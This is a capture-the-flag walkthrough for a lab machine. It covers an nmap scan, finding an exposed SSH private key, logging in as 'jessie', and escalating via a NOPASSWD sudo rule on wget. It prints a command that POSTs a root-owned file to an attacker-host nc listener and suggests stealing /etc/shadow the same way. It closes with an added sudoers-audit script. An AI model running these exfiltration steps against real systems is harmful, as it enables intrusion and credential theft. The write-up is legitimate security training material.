Nmap Results:
# Nmap 7.93 scan initiated Tue Nov 1 19:39:24 2022 as: nmap -p- -sC -sV -A -T4 -oA nmap_full -v 10.10.15.120
adjust_timeouts2: packet supposedly had rtt of -92282 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -92282 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -119000 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -119000 microseconds. Ignoring time.
Nmap scan report for 10.10.15.120
Host is up (0.090s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 94961b66801b7648682d14b59a01aaaa (RSA)
| 256 18f710cc5f40f6cf92f86916e248f438 (ECDSA)
|_ 256 b90b972e459bf32a4b11c7831033e0ce (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
Uptime guess: 12.192 days (since Thu Oct 20 15:04:24 2022)
Network Distance: 4 hops
TCP Sequence Prediction: Difficulty=265 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 993/tcp)
HOP RTT ADDRESS
1 22.85 ms 10.6.0.1
2 ... 3
4 89.47 ms 10.10.15.120
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Nov 1 19:40:48 2022 -- 1 IP address (1 host up) scanned in 83.83 seconds
We can see that port 80 is serving HTTP. Visiting the home page, we find the Apache2 default page, which has been modified and contains some comments:
In those comments, someone called Jessie is mentioned. This may also be a username.
Running dirbuster against the URL http://thm.ip/sitemap/ with the wordlist /usr/share/wordlists/dirb/common.txt, we find a directory called .ssh.
Fast forward: browsing the .ssh directory over HTTP, we find an id_rsa private key.
So we download id_rsa to our attacking machine, set the proper permissions on the private key file, and try it with the username jessie.
kali$ chmod 600 ./id_rsa
kali$ ssh jessie@thm.ip -i ./id_rsa
Apparently the user flag is not in the home directory, so we can run a quick find command to locate every file whose name contains "flag".
kali$ find / -name "*flag*" -type f 2>/dev/null
Within a second, we find the flag at /home/jessie/Documents/user_flag.txt.
Time for escalation. Running a quick "sudo -l", we see that we can execute /usr/bin/wget as root without a password.
With root access to wget, we can read a file and send it out over HTTP. First, on our attacking machine, we run nc to listen on port 80; then, on the target machine, we use wget's --post-file parameter to read root_flag.txt and POST it to the attacking machine's nc listener.
Attacking Machine:
kali$ nc -lnvp 80 > root_flag.txt
listening on [any] 80 ...
Victim Machine:
jessie@CorpOne:~/$ sudo /usr/bin/wget --post-file=/root/root_flag.txt attacker_ip
You can also read the /etc/shadow file the same way and crack jessie's hash to obtain full sudo access.
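The root cause here is a NOPASSWD sudo rule on a binary that can read or write arbitrary files. The following audit script is an added example, not part of the original writeup: it flags such rules in a sudoers file, using an assumed list of risky binaries (wget among them) and a constructed sample sudoers instead of the target's real one.

```sh
#!/bin/sh
# Added example, not part of the original writeup: audit a sudoers file for
# NOPASSWD rules granting binaries that can read or write arbitrary files as
# root (the class of rule that made "sudo wget --post-file" work above).
# RISKY_BINS is an assumed list of common file-transfer/editing tools.
RISKY_BINS="wget curl tar cp mv dd tee find vim less more nano"

# risky_sudo_rules FILE
# Prints "<user> <command>" for every NOPASSWD rule whose command is ALL or
# one of RISKY_BINS. Comment lines are dropped; #includedir is not followed.
risky_sudo_rules() {
    grep -v '^[[:space:]]*#' "$1" | grep 'NOPASSWD' | while IFS= read -r rule; do
        user=${rule%%[[:space:]]*}        # first field: user or %group
        cmds=${rule##*:}                  # text after the last tag (NOPASSWD:)
        printf '%s\n' "$cmds" | tr ',' '\n' | while IFS= read -r cmd; do
            # trim leading blanks and drop any arguments, keep the path only
            cmd=$(printf '%s' "$cmd" | sed 's/^[[:space:]]*//; s/[[:space:]].*$//')
            [ -n "$cmd" ] || continue
            bin=${cmd##*/}
            case "$bin" in
                ALL) printf '%s ALL\n' "$user" ;;
                *) case " $RISKY_BINS " in
                       *" $bin "*) printf '%s %s\n' "$user" "$cmd" ;;
                   esac ;;
            esac
        done
    done
}

# Constructed sample sudoers content (not taken from the target machine).
SAMPLE_SUDOERS='root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
jessie  ALL=(root) NOPASSWD: /usr/bin/wget
backup  ALL=(root) NOPASSWD: /usr/bin/rsync, /bin/tar
deploy  ALL=(ALL) NOPASSWD: ALL'

# Run against the sample; in practice point it at /etc/sudoers and
# /etc/sudoers.d/* on the host being reviewed.
tmp=$(mktemp)
printf '%s\n' "$SAMPLE_SUDOERS" > "$tmp"
risky_sudo_rules "$tmp"
rm -f "$tmp"
```

Any line it prints is a rule worth removing or tightening, since each listed binary lets the user read or replace root-owned files without a password.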
Peace